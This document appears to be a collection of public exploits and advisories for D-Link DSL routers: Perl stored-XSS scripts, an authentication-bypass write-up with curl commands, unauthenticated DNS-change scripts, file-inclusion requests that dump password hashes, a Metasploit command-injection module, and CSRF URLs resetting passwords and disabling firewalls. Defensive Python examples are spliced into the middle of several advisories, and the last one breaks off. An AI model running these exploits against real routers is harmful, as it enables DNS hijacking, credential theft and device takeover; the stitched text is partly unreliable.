			$ip = $1 if($ip=~/(.*)\/$/);

			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "[+] Exploring $ip\/ ...\n";

			my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";
			
			my $ua = new LWP::UserAgent;

			my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

			$hdrs->authorization_basic($user, $pass);
			
			chomp($ip);

			
			print "[+] Preparing exploit...\n";
			
			my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";
						
			my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

			print "[+] Prepared!\n";
			
			print "[+] Requesting and Exploiting...\n";
			
			my $resp = $ua->request($req);

			if ($resp->is_success){

			print "[+] Successfully Requested!\n";
			
			
				my $url = "$ip/todmngr.tod?action=urlview";
			
				$req = new HTTP::Request("GET",$url,$hdrs);

				print "[+] Checking that was explored...\n";
				
				
				my $resp2 = $ua->request($req);
				
				
				if ($resp2->is_success){

				my $resultado = $resp2->as_string;
				
							if(index($resultado, uri_unescape($payload)) != -1){
							
								print "[+] Successfully Exploited!";

							}else{
							
								print "[-] Not Exploited!";
							
							}
				}

			}else {

				print "[-] Ops!\n";
				print $resp->message;

			}


}
            
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

	my $ip = $ARGV[0];

	my $user = $ARGV[1];

	my $pass = $ARGV[2];
		

		if (@ARGV != 3){

			print "\n";
			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

		}else{

			$ip = $1 if($ip=~/(.*)\/$/);

			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "[+] Exploring $ip\/ ...\n";

			my $payload = "%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E";
			
			my $ua = new LWP::UserAgent;

			my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

			$hdrs->authorization_basic($user, $pass);
			
			chomp($ip);

			
			print "[+] Preparing exploit...\n";
			
			my $url_and_xpl = "$ip/todmngr.tod?action=add&username=$payload&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840";
						
			my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

			print "[+] Prepared!\n";
			
			print "[+] Requesting and Exploiting...\n";
			
			my $resp = $ua->request($req);

			if ($resp->is_success){

			print "[+] Successfully Requested!\n";
			
			
				my $url = "$ip/todmngr.tod?action=view";
			
				$req = new HTTP::Request("GET",$url,$hdrs);

				print "[+] Checking that was explored...\n";
				
				
				my $resp2 = $ua->request($req);
				
				
				if ($resp2->is_success){

				my $resultado = $resp2->as_string;
				
							if(index($resultado, uri_unescape($payload)) != -1){
							
							print "[+] Successfully Exploited!";

							}else{
							
							print "[-] Not Exploited!";
							
							}
				}

			}else {

			print "[-] Ops!\n";
			print $resp->message;

			}


}
            
# Exploit Title: D-Link DSL 3782 - Authentication Bypass
# Vendor Homepage: https://eu.dlink.com
# Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
# Category: Webapps
# Exploit Author: Giulio Comi
# CVE : CVE-2018-8898
# Date: 20/05/2018

# Description
# The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not release a token ID (e.g. a session cookie) that identifies the logged-in administrator, but relies only on a server-side timeout that lasts a few minutes.
# In addition, a server-side mitigation prompts for login credentials every time the webroot is loaded, but leaves the application endpoints unprotected and affected by this authentication bypass.

# Therefore, after a valid login by the administrator, the web panel does not distinguish valid HTTP requests from the admin from ones that come from other users.
# This way, an attacker can script an automatic routine that performs unwanted actions such as arbitrary modifications to router and SSID passwords and configurations.

# Some of the possible actions for retrieving important information
# GET  http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for SSID of 2.4Ghz
# GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for SSID of 5.0Ghz
# GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp    ---> retrieve the password for Guest network, if present

# For POST requests that make changes to passwords, SSID names and configurations, a 'sessionKey' value is used by the web application to prevent Cross-site request forgery (CSRF) attacks.
# However, this value can be retrieved through the same authentication bypass with the following GET request:
# 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'

# For example, the below POST request allows to change the Web Interface Administrator's password:
curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp

# Some other possible actions for altering the configurations:
# POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change passwords of the SSIDs
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade firmware
# POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot router
# POST /cgi-bin/New_GUI/Set/config_upgrade.asp  ---> upload a new configuration file ('romfile.cfg')

# Note 1: Since the router lacks network segregation, a user who has access to the Guest network could also perform this attack.
# Note 2: Web panels exposed to the Internet allow an anonymous attacker to leverage this vulnerability and possibly take over the router.
# Note 3: Other forks of the firmware and software versions have not been tested.
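What makes this bypass possible is the session model, not any single endpoint: the device records "an admin is logged in" as one server-wide timer and hands the client nothing that later requests must present. As an added example, not from the advisory or from D-Link, the two toy authorisers below put the vulnerable model and the conventional fix side by side and replay the scenario with a fake clock. Endpoint names are taken from the advisory; the classes, the 300-second window and the password are assumptions.

```python
"""Added example, not from the advisory or from D-Link. TimeoutGate models
what the advisory describes: one server-wide 'admin is logged in' timer and
no token issued to the client, so any request inside the window is accepted
regardless of sender. SessionGate is the conventional fix: a random cookie
bound to the login, plus a per-session sessionKey that POSTs must carry.
Endpoint names come from the advisory; everything else is assumed."""
import hmac
import secrets

LOGIN_WINDOW = 300.0      # assumed length of the 'few minutes' server-side timeout
ADMIN_PASSWORD = "admin"  # toy value; a real device would store a hash


class TimeoutGate:
    """Vulnerable design: authentication state is global, not per client."""

    def __init__(self, clock):
        self.clock = clock        # callable returning seconds
        self.admin_until = 0.0

    def login(self, password):
        if hmac.compare_digest(password, ADMIN_PASSWORD):
            self.admin_until = self.clock() + LOGIN_WINDOW
        return None               # no cookie or token is issued

    def authorise(self, request):
        """Every endpoint is open while the timer runs, whoever asks."""
        return self.clock() < self.admin_until


class SessionGate:
    """Hardened design: a secret cookie identifies the logged-in client, and
    state-changing requests must also present that session's CSRF key."""

    def __init__(self, clock):
        self.clock = clock
        self.sessions = {}        # cookie -> {"expires": t, "csrf": key}

    def login(self, password):
        if not hmac.compare_digest(password, ADMIN_PASSWORD):
            return None
        cookie = secrets.token_urlsafe(32)
        self.sessions[cookie] = {"expires": self.clock() + LOGIN_WINDOW,
                                 "csrf": secrets.token_urlsafe(16)}
        return cookie

    def _live(self, cookie):
        sess = self.sessions.get(cookie)
        if sess is None or self.clock() >= sess["expires"]:
            return None
        return sess

    def session_key(self, cookie):
        """What get_sessionKey.asp should do: answer only a valid session."""
        sess = self._live(cookie)
        return sess["csrf"] if sess else None

    def authorise(self, request):
        sess = self._live(request.get("cookie"))
        if sess is None:
            return False
        if request["method"] == "POST":
            return hmac.compare_digest(request.get("sessionKey", ""), sess["csrf"])
        return True


def demo():
    """Replay the advisory's scenario against both gates with a fake clock."""
    now = [0.0]

    def clock():
        return now[0]

    outcome = {}
    vuln = TimeoutGate(clock)
    vuln.login(ADMIN_PASSWORD)                 # admin logs in at t=0
    now[0] = 60.0                              # attacker, one minute later, no cookie
    outcome["vuln GET romfile.cfg"] = vuln.authorise(
        {"method": "GET", "path": "/romfile.cfg"})
    now[0] = 400.0                             # window has lapsed
    outcome["vuln GET after timeout"] = vuln.authorise(
        {"method": "GET", "path": "/romfile.cfg"})

    now[0] = 0.0
    fixed = SessionGate(clock)
    admin_cookie = fixed.login(ADMIN_PASSWORD)
    now[0] = 60.0
    admin_post = "/cgi-bin/New_GUI/Set/Admin.asp"
    outcome["fixed GET no cookie"] = fixed.authorise(
        {"method": "GET", "path": "/romfile.cfg"})
    outcome["fixed GET guessed cookie"] = fixed.authorise(
        {"method": "GET", "path": "/romfile.cfg", "cookie": secrets.token_urlsafe(32)})
    outcome["fixed GET admin"] = fixed.authorise(
        {"method": "GET", "path": "/romfile.cfg", "cookie": admin_cookie})
    outcome["fixed POST admin no key"] = fixed.authorise(
        {"method": "POST", "path": admin_post, "cookie": admin_cookie})
    outcome["fixed POST admin with key"] = fixed.authorise(
        {"method": "POST", "path": admin_post, "cookie": admin_cookie,
         "sessionKey": fixed.session_key(admin_cookie)})
    return outcome


if __name__ == "__main__":
    for case, allowed in demo().items():
        print("%-28s %s" % (case, "allowed" if allowed else "denied"))
```

The second half also shows why the advisory's sessionKey trick works: a CSRF key only helps when fetching it requires the same credential as using it, so get_sessionKey.asp has to sit behind the session check too.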

# Timeline
# 26/03 Vendor contacted
# 28/03 Vendor replied
# 05/04 Vendor requested more information to track the vulnerable firmware version 'because the D-Link DSL 3782 have many forks'
# 05/04 I have sent the detailed information of firmware and software version retrievable from:
#       - the web panel graphic ('A1_WI_20170303')
#       - the romfile.cfg ('SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"')
# 20/04 requested an update, no response
# 03/05 requested an update, no response
# 07/05 requested an update, still no response from the security response team
# 20/05 full disclosure
            
  D-Link DSL-2780B DLink_1.01.14 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
            
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in

#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )

#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)


#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################

Summary:

The Dlink DSL-2750u and DSL-2730u wireless routers improve
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.


Desc:

The router suffers from an authenticated local file inclusion (LFI)
vulnerability: input passed through the 'getpage' parameter of the 'webproc'
script is not properly validated before being used to include files, so files
from the local filesystem can be read.
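The fix for this class of bug is to refuse any getpage value that resolves outside the web root, and the same pattern is easy to spot in access logs. The code below is an added example, not the firmware's or the advisory author's code: resolve_getpage() is the check the webproc CGI lacks, and flag_webproc_requests() scans constructed combined-format log lines for the requests shown in this advisory. The web root /www/html and the log lines are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit


def resolve_getpage(webroot, getpage):
    """Return the absolute file path for a 'getpage' value, or None if it must be refused.

    The vulnerable webproc CGI used the parameter as-is, so '/etc/passwd' was included
    directly.  Here an absolute path, an empty value, or any '..' escape that resolves
    outside the web root is rejected before a file is ever opened.
    """
    if not getpage or getpage.startswith(("/", "\\")):
        return None
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, getpage))
    # realpath() has collapsed '..' and symlinks, so a prefix test on the result is sound
    if candidate == root or not candidate.startswith(root + os.sep):
        return None
    return candidate


# Directories that no page include should ever reach, even via a relative value.
SYSTEM_DIRS = re.compile(r"(^|/)(etc|proc|dev|var|tmp)(/|$)")
# Minimal combined-log parser: client ip and the request target are all we need here.
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_webproc_requests(log_lines):
    """Return (client_ip, getpage) for every webproc request whose getpage value is
    absolute, traverses upward, or names a system directory."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/cgi-bin/webproc"):
            continue
        for value in parse_qs(url.query).get("getpage", []):
            if value.startswith("/") or ".." in value or SYSTEM_DIRS.search(value):
                hits.append((client, value))
    return hits


# Constructed log lines mirroring the requests shown in this advisory (not real traffic).
SAMPLE_LOG = [
    '192.168.31.50 - - [07/Jul/2015:10:02:11 +0530] "GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=html/main.html HTTP/1.1" 200 5120',
    '192.168.31.50 - - [07/Jul/2015:10:02:19 +0530] "GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1" 200 312',
    '192.168.31.50 - - [07/Jul/2015:10:02:25 +0530] "GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1" 200 290',
    '192.168.31.50 - - [07/Jul/2015:10:02:31 +0530] "GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=html/../../etc/passwd HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for client, value in flag_webproc_requests(SAMPLE_LOG):
        print(f"{client} requested getpage={value!r}; hardened resolver gives {resolve_getpage('/www/html', value)}")
```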


Tested on: mini_httpd/1.19 19dec2003



===============================================================


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive


HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive


HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DSL-2750B OS Command Injection',
      'Description'    => %q(
        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
      ),
      'Author'         =>
        [
          'p@ql', # vulnerability discovery
          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['PACKETSTORM', 135706],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
        ],
      'Targets'        =>
        [
          [
            'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux mipsel Payload',
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate'  => 'Feb 5 2016',
      'DefaultTarget'   => 0))

    deregister_options('CMDSTAGER::FLAVOR')
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/ayefeaturesconvert.js'
    )

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
      vprint_status('Remote host is not a DSL-2750')
      return CheckCode::Safe
    end

    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
      version = Regexp.last_match[1]
      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
      if version >= "1.01" && version <= "1.03"
        return Exploit::CheckCode::Appears
      end
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    return CheckCode::Unknown
  end

  def execute_command(cmd, _opts)
    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => '/login.cgi',
        'vars_get' => {
          'cli' => "#{payload}$"
        },
        'encode_params' => false
      },
      5
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
  end

  def exploit
    print_status("#{peer} Checking target version...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    execute_cmdstager(
      flavor: :wget,
      linemax: 200
    )
  end
end
            
#!/bin/bash
#
#  D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  
#  Description:  
#  Different D-Link routers are vulnerable to DNS change.
#  The vulnerability exists in the web interface, which is
#  accessible without authentication.
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
#  DEVICES MAY BE AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#     

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "     D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
        echo "  ================================================================"
        echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
        echo "  Example: $0 192.168.1.1 8.8.8.8"
        echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
        echo ""
        echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
        echo "                  http://www.ethical-hacker.org/"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
        GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
            
#!/bin/sh
# 
#  D-Link ADSL ROUTER DSL-2730U IN_1.02
#  Remote File Disclosure
#
#  Modem Name:               DSL-2730U/DSL-2750E
#  Time and Date:            2012-05-23 09:51:16
#  HardwareVersion:          U1
#  Firmware Version:         IN_1.02/SEA_1.04/SEA_1.07
# 
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova, who supports me.

[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
#  #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
            
Author		: 	B GOVIND
Exploit Title	: 	DLink DSL-2730U Wireless N 150, Change DNS Configuration bypassing ‘admin’ privilege
Date		: 	01-03-2017
Vendor Homepage	: http://www.dlink.co.in
Firmware Link	: ftp://support.dlink.co.in/firmware/DSL-2730U
Affected version	:  Hardware ver C1, Firmware ver: IN_1.0.0
Email id	: govindnair7102@gmail.com 
CVE		:  CVE-2017-6411

Change DNS Configuration Bypassing ‘admin’ Privilege
-------------------------------------------------------

D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only the ‘admin’ account has unrestricted access to change the configuration of the device. The ‘user’ account can only view configuration settings and statistics.

1.	Description of Vulnerability

Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using ‘admin’ account. 

2.	Proof of Concept	

Use following URL to modify the DNS entries:

	http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1

	Here x.x.x.x and y.y.y.y are the malicious IP addresses the attacker can use.



3.	Impact of vulnerability
	
Information Disclosure: An attacker exploiting this vulnerability can obtain confidential information such as users' browsing profiles. Modifying the device's DNS settings allows cybercriminals to perform malicious activities such as the following:

(a)	Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoof well-known sites and trick users into submitting sensitive credentials such as bank account usernames and passwords.

(b)	Prevent patches from being downloaded from OS vendor or firewall vendor sites.

(c)	Replace ads on legitimate sites and serve users unwanted/fake ads.

(d)	Push malware.

4.	Solution

As per D-Link India, no updated firmware is available for this hardware version that mitigates this vulnerability and prevents the privilege escalation.
All users of this hardware should change the default passwords of not just the ‘admin’ account but also ‘user’ and ‘support’.

Change All Account Password Bypassing ‘admin’ Privilege
----------------------------------------------------------
 
    D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only the ‘admin’ account has unrestricted access to change the configuration of the device. The ‘user’ account can only view configuration settings and statistics. The default passwords of the admin, support and user accounts are admin, support and user respectively.
 
1.  Description of Vulnerability
 
    Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using ‘admin’ account. 
 
2.  Proof of Concept    
 
This exploit works only when accounts are using default password.
 
(a) Use the following URL to change the ‘admin’ account password from ‘admin’ to ‘admin1’.
 
    http://user:user@192.168.1.1/password.cgi?inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
 
(b) Use the following URL to change the ‘support’ account password from ‘support’ to ‘support1’.
 
    http://user:user@192.168.1.1/password.cgi?inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
 
(c) Use the following URL to change the ‘user’ account password from ‘user’ to ‘user1’.
 
    http://user:user@192.168.1.1/password.cgi?inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
 
Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both password strings are base64 encoded for confidentiality, as the connection between browser and web server uses plain HTTP.
 
 
3.  Impact of vulnerability
     
Elevation of privilege, Information Disclosure, Denial Of service
 
(a) An insider/attacker can change the passwords of all existing accounts and control the device as required. This gives the attacker complete control over the device: they can capture and analyse other users' traffic, and deny service at will.
 
4.  Solution
 
    As per D-Link India, no updated firmware is available for this hardware version that mitigates this vulnerability. All users of this hardware should change the default passwords of all the default accounts.


Enable/Disable LAN side Firewall without admin privilege
---------------------------------------------------------

	D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only the ‘admin’ account has unrestricted access to change the configuration of the device. The ‘user’ account can only view configuration settings and statistics. The default passwords of the admin, support and user accounts are admin, support and user respectively.

1.	Description of Vulnerability

	Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable the LAN side firewall without ‘admin’ privilege using the ‘user’ account.

2.	Proof of Concept	

   Use following URL to enable LAN side firewall

	http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0



Use following URL to disable LAN side firewall

http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0


3.	Impact of vulnerability
	
By disabling the LAN side firewall and enabling Port Triggering, an attacker can establish backdoor access from the LAN side as well as from the WAN side.
An attacker can also run port scanning tools to map services, which would otherwise not be possible with the firewall enabled.

4.	Solution

	As per D-Link India, no updated firmware is available for this hardware version that mitigates this vulnerability. All users of this hardware should change the default passwords of all the default accounts.
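The three findings above share one root cause: dnscfg.cgi, password.cgi and lancfg2.cgi accept a change from whichever account can authenticate. Below is an added example, not D-Link's code, of the authorization policy the device lacks and a check that replays it over web-server logs (combined format, where the third field is the HTTP Basic user) to find changes a non-admin account was allowed to make. The policy itself, the 203.0.113.x addresses and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Configuration CGIs the advisory shows being driven from the 'user' account.
CONFIG_CGIS = {"/dnscfg.cgi", "/password.cgi", "/lancfg2.cgi"}
ADMIN_ACCOUNTS = {"admin"}


def is_allowed(account, path, params):
    """Assumed authorization policy (the device applies none): configuration CGIs are
    admin-only, except that any account may change its own password."""
    if path not in CONFIG_CGIS:
        return True                      # status and view pages: 'user' and 'support' may read
    if account in ADMIN_ACCOUNTS:
        return True
    if path == "/password.cgi":
        target = params.get("inUserName", [""])[0]
        return target == account         # 'user' may not set 'admin' or 'support' passwords
    return False


def describe(path, params):
    """One-line summary of what the request changed, for the audit output."""
    def first(key):
        return params.get(key, [""])[0]
    if path == "/dnscfg.cgi":
        return f"DNS set to {first('dnsPrimary')}/{first('dnsSecondary')}"
    if path == "/password.cgi":
        return f"password change for account '{first('inUserName')}'"
    if path == "/lancfg2.cgi":
        return "LAN firewall disabled" if first("enblLanFirewall") == "0" else "LAN settings changed"
    return "configuration change"


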